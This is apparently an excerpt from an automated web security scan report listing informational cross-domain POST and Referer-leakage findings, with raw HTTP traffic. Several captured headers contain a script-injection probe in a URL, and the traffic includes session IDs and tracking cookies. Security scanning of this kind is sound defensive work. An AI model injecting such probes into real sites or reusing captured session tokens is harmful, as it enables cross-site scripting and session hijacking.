Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 00:46:53 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 431


   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:74px; height: 18px;\" allowTransparency=\"true\"><\/iframe>";
       document.write(bdg);
   }
   writeSuBadge();

Request 2

GET /hostedbadge.php?s=1 HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=4978204034dc82e628d10f2.45366819; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2F; su_conf=33e75ff09dd601bbe69f351039152189; __utmz=189632489.1304964711.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); su_visitorid=129409943%7Cebdeb97cb1676374c151b3c1687a96f6; su_c=28a75dd4ade42afdef0de3985f50ca5c%7C%7C50%7C%7C1304964706%7C3659c970b128684d688c3ff44795c841; __utma=189632489.1867389869.1304964711.1304967080.1304972266.3; __utmv=189632489.|1=user_class=v=1,

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 12 May 2011 00:47:34 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 295


   function writeSuBadge () {
       var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/1\/?url=\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:74px; height: 18px;\" allowTransparency=\"true\"><\/iframe>";
       document.write(bdg);
   }
   writeSuBadge();

17. Cross-domain POST
There are 8 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


17.1. http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anpisolutions.com
Path:   /wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

Issue detail

The page contains a form which POSTs data to the domain anpisolutions.web4.hubspot.com. The form contains the following fields:

Request

GET /wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/ HTTP/1.1
Host: www.anpisolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:05 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Accept-Ranges: bytes
X-Pingback: http://www.anpisolutions.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/html; charset=UTF-8
Content-Length: 23377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
<img width="197" height="47" border="0" alt="Learn how to save 25% or more on your SS7 costs" src="/wp-content/uploads/SS7Inquiry.jpg" />
<form action="http://anpisolutions.web4.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26732" method="post">
<input type="hidden" name="FormSubmitRedirectURL" id="FormSubmitRedirectURL" value="http://www.anpisolutions.com/thank-you-for-your-interest-in-signaling-network-and-database-services" >
...[SNIP]...

17.2. http://www.onwav.com/lnp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onwav.com
Path:   /lnp

Issue detail

The page contains a form which POSTs data to the domain paytrace.com. The form contains the following fields:

Request

GET /lnp HTTP/1.1
Host: www.onwav.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: dancer.session=893606761925970901924588756288095317; path=/; HttpOnly
X-Powered-By: Perl Dancer 1.3011
Date: Thu, 12 May 2011 00:48:31 GMT
Connection: keep-alive
Content-Length: 3893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>OnWav</title>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<div id="payfloat">
<form action='https://paytrace.com/cart/donate.pay' method=post>
<p>
...[SNIP]...

17.3. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.4. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.5. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.6. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.7. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.8. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

18. Cross-domain Referer leakage
There are 37 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


18.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=125x125;tile=2;pos=smsquare1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:08 GMT
Content-Length: 357

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/c;222977620;0-0;0;44107191;3-125/125;36626365/36644243/1;;~sscs=%3fhttp://connectedplanetonline.com/wireless-broadband/"><img src="http://s0.2mdn.net/viewad/2577238/CP_MotoWirelessCenter10_125.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.2. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=120x60;tile=5;pos=button1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:15 GMT
Content-Length: 334

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/t;221160671;0-0;0;44107191;6-120/60;35086960/35104790/1;;~sscs=%3fhttp://www.connectedplanetonline.com/whitepapers"><img src="http://s0.2mdn.net/viewad/2577238/CP_WPP120.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=336x280;tile=3;pos=boombox1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:11 GMT
Content-Length: 375

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/f;222973530;0-0;0;44107191;4252-336/280;37538309/37556187/1;;~sscs=%3fhttp://connectedplanetonline.com/progress-software/?cid=336"><img src="http://s0.2mdn.net/viewad/2577238/1-CP_ProgressSoftware_Micro_336ver3.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.4. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;dcopt=ist;sz=728x90;tile=1;pos=fullbanner1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:48:04 GMT
Content-Length: 328

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/k;238282886;0-0;0;44107191;3454-728/90;41177685/41195472/1;;~sscs=%3fhttp://www.tmforum.org/mw2011cp"><img src="http://s0.2mdn.net/viewad/2577238/MWDublin728X90WEB.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.5. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=300x125;tile=4;pos=small3001;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
